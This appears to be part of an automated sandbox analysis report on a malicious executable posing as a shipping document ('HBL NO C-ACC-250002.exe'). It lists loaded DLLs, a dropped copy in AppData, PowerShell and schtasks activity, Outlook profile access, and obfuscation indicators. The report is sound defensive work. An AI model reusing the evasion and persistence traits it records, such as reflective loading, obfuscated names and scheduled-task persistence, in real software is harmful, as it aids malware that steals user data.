                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: HBL NO C-ACC-250002.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: HBL NO C-ACC-250002.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs.Net Code: YlORmcVtnP System.Reflection.Assembly.Load(byte[])
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs.Net Code: YlORmcVtnP System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 0_2_07342210 push eax; retf 0_2_0734221D
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05092E60 push esp; iretd 9_2_05092E79
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B2840 push esp; retf 14_2_057B2AC9
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B2E78 push esp; iretd 14_2_057B2E79
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699F0B2 push es; ret 14_2_0699F0B8
                Source: HBL NO C-ACC-250002.exeStatic PE information: section name: .text entropy: 7.829135637285953
                Source: uyDicX.exe.0.drStatic PE information: section name: .text entropy: 7.829135637285953
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.csHigh entropy of concatenated method names: 'YPYhKoeWJX', 'C3xhL0k6ZA', 'PnZhHZaXrM', 'dMkhJooWLH', 'INmh3Xo95l', 'vLehIe3asP', 'P82h5mjbhW', 'cvxhNXbHvi', 'CX6hsOPlfk', 'miqhrr6hbZ'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MoqyMhKfR5ZLSgV4xq.csHigh entropy of concatenated method names: 'GDIYqhjdbs', 'iBAYPYG5MT', 'CNZYKdlmr9', 'tmOYLDYbpw', 'X7RYSwAxUA', 'MPHYnJcbq7', 'I3RYZKBBcQ', 'nPvYdXyHFq', 'WZKY1BaUYO', 'rOnYCQLft6'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YFlHc9FRLodglFhil2.csHigh entropy of concatenated method names: 'CfHoGKJPAp', 'Is2ohx9NjZ', 'YSYo0cBv0r', 'zanoOfxncP', 'vbuoMJn2jp', 'b8b03iXl7I', 'Lpt0IwjhPk', 'lY905vtxKg', 'KFm0NknFcH', 'wNA0sJeaKM'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, Ft1xorcR9nfR3PLHEV2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PpY9fyOqZC', 'reo9u2y3Vp', 'c2R9DhsbFm', 'iSn99eAKWn', 'O1997qWdU8', 'OlP9tXJDZa', 'm3T9Qn6Wyb'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, LTQ4HuccTwyWsx1plV0.csHigh entropy of concatenated method names: 'KapureQ5qN', 'B5auzAZFtv', 'Es1Di1Mf3e', 'S01DcEYaVL', 'WyIDwYYTrL', 'lxPD2ZcUZE', 'BfhDRydOMO', 'H3JDGyQiIk', 'YU6DkfTK7u', 'wygDhwDQHj'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, Tkt4wHlmAKfXdWtNJ2.csHigh entropy of concatenated method names: 'pFsOXCkO2M', 'kvdOyVleBR', 'sucOmc6y86', 'SJROedhrAF', 'RwqOT9kFio', 'aEVOjQrC0X', 'lFpOB0SH6O', 'OryOgUGw3s', 'lFrO6x3DB7', 'CvlOUyBWIb'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, hhLLZuzZxj1m3Zu6xC.csHigh entropy of concatenated method names: 'OBAujm0FlY', 'XdUugdZTyd', 'U12u6HGa6n', 'NdmuFWyiDv', 'XgkuS1Gl0C', 'XGvuZ3H4pw', 'go1ud6txl9', 'A6guQkOSZt', 'tZYuXRHFjo', 'hFAuyGth4v'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, ej4Qr1IUJDvF9DuJ0E.csHigh entropy of concatenated method names: 'iL6bNRoADV', 'X26br5ieKL', 'MjjEi151OW', 'OpUEcNC4yP', 'kJ9bpKkIFm', 'KJnbP6PIu7', 'y3YbxrBuXJ', 'bwtbKpOjah', 'IRobLuBiWs', 'vsrbHUIk72'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YDRIHlsmNrKQTNfDK1.csHigh entropy of concatenated method names: 'gg9fFTiwm7', 'VoifSbhf42', 'Ceyfns06jS', 'irPfZvtvK4', 'vcafdZPacO', 'N3Jf1NmZOn', 'yEvfCd7IYd', 'dBDfaliCra', 'H7LfllbkJq', 'tpGfqEZFKn'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, CX40lb61IQjMgJJ9Xp.csHigh entropy of concatenated method names: 'xMWvee6ruB', 'bZxvjSb03C', 'UxfvgNu6Gx', 'pvfv6lyDuv', 'HksvYYxiNC', 'PJivVbfkA5', 'HG4vbwM19g', 'IUAvE1jlDM', 'C0kvfGVI7n', 'ORFvuhxk0G'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, DYR5mgvByZ5AqfKXPJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IOawsaFIyF', 'dLHwrlw9GX', 'jhkwzZ79BX', 'pvZ2ij9qDD', 'Y3a2cKeTVs', 'Xfr2wiwFM7', 'tmq22OPiPx', 'iNcxj3x8AScqIKwUgyl'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, LecK7pRFDoRvlOpnsK.csHigh entropy of concatenated method names: 'EaocOyFcKG', 'utCcMppqGG', 'q1Ic4QjMgJ', 'T9XcApfynF', 'xZvcYVgrFl', 'Sc9cVRLodg', 'FW9Lm9IobJ7wAFaKKq', 'x48a31vlaHMCGDKOEn', 'iy3ccHRZar', 'UkJc2xqDNq'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MVTp3tHWwbTqXbrBQ6.csHigh entropy of concatenated method names: 'ToString', 'gRkVpTPjyW', 'H3AVShmVJT', 'NL2VnhFcHT', 'mXVVZIXHgT', 'P8SVd89hXI', 'mADV1PDrng', 'MaVVCj4Nhe', 'M8yVakO6IR', 'GepVlEXhjZ'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, synFdbUAAYG4FXZvVg.csHigh entropy of concatenated method names: 'TML0TZOIXD', 'c8a0BauMu1', 'eEEvnYUwhi', 'g7bvZwoxMm', 'AqYvdEj7Uw', 'nXDv1gokyc', 'axTvC3nNSB', 'J1yvaHU9xI', 'XeCvlV2tbP', 'M7dvqtrdxt'
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, WKGKBnxuD29SR6iMy0.csHigh entropy of concatenated method names: 'glFWge1w8H', 'TRcW6DDgEM', 'noyWFGFMuG', 'iv0WSoYFoi', 'o5eWZM7tDq', 'RNBWdHHhej', 'V81WCojX8U', 'pZsWanDcfL', 'nbIWqRBHaV', 'v6tWpRcuPP'
